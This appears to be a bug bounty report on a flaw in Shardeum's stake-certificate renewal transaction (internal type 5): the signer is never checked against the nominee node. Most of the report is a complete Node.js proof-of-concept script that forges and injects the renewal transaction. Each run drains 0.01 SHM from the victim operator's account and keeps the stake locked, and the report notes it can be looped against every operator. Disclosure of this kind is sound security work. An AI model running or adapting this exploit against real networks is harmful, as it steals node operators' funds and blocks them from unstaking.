In shardeum there's a mechnism that can extends the expiration date of a stake certificate by the node that is belong to the particular staking. Such transaction is considered internal tx type 5, according to enum ( see ref.1) Athough shardeum check the validity (see ref.2) of the signature, its failure to check the sign owner of the transaction is the same as nominated node's public key let attacker to be able to extends the stake certification on behalf of the victim node. Since shardeum deduct ( see ref.3) transaction cost from node operator account for transaction. The third party can drain the fund. Also unstaking is not possible (see ref.4) before the stake certificate expired, thus, attacker can renew stake certificate of aparitcular node indefintely to keep the stakes locked.
References:
Proof of Concept
Launch a network of legit nodes
Please stake them
Once you stake a node, wait for it to go active
Node has to be staked, (Warning: this will not work on node that can be active without staking) for some reason the first few node in shardeum go active without staking. Please launch more node than minNode is set in the config, the subsequent node will require staking.
Grab the public key of the staked node that is in the active list you want to attack its certificate
Create an empty node project for our attack script
mkdir attack
cd attack
npm init -y
npm install axios @shardus/crypto-utils
create a file and name attack.js and copy paste the source code below
execute below script node attack.js [insert victim public key],
const axios = require ('axios');
const crypto = require('@shardus/crypto-utils')
crypto.init("69fa4195670576c0160d660c3be36556ff8d504725be8a59b5a96509e0c994bc")
const { publicKey, secretKey } = crypto.generateKeypair()
const target = process.argv[2].replace('0x', '')
const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms))
const main = async () => {
console.log("Grabbing Nodelist ....");
const res = await axios.get('http://0.0.0.0:4000/nodelist')
let url = null
const nodelist = res.data.nodeList
const randomNode = nodelist[Math.floor(Math.random() * nodelist.length)]
console.log("Finding victim node in active list ....");
for(const node of nodelist) {
if(node.publicKey === target) {
url = `http://${node.ip}:${node.port}/account/${target}`
}
}
if(!url) throw new ("Victim node is not in active yet")
const res2 = await axios.get(url)
const setCertTimeTx = {
isInternalTx: true,
internalTXType: 5,
nominee: "",
nominator: "",
duration: 19,
timestamp: Date.now() + 1000,
}
setCertTimeTx.nominator = res2.data.account.nominator
setCertTimeTx.nominee = target
const nominator = setCertTimeTx.nominator.replace('0x', '').padEnd(64, '0')
const before = await axios.get(`http://${randomNode.ip}:${randomNode.port}/account/${nominator}`)
console.log("Balance and certExp before attack --------------------------------------")
console.log(before.data);
console.log("Constructing InternalTx setCertTime: ", setCertTimeTx)
crypto.signObj(setCertTimeTx, secretKey, publicKey)
console.log("Signing InternalTx setCertTime: ", setCertTimeTx)
console.log("Firing InternalTx setCertTime ....")
const res3 = await axios.post(`http://${randomNode.ip}:${randomNode.port}/inject`, setCertTimeTx)
if(!res3.data.success) throw new Error(res3.data.reason)
console.log("Waiting 10 sec for transaction to be finalized");
await sleep(10000)
const after =await axios.get(`http://${randomNode.ip}:${randomNode.port}/account/${nominator}`)
console.log("Balance and certExp after attack --------------------------------------")
console.log(after.data);
}
main();
You can observe the balance of nominator / node operator account's balance being deducted 0.01 SHM per each tx and certExp is kept being updated to the future.
Observe operator account's balance is drained 0.01 SHM per attack and cerExp is updated per attack. This can be run in loop.
Impact
As stated above, this is a direct loss of fund for node operator and blocking the unstaking of a node. Attacker can modify this script to be in loop indefinity to drain the operator account and lock the unstaking forever. This can be targeted to single operator or all the operator in the network simultaneously.
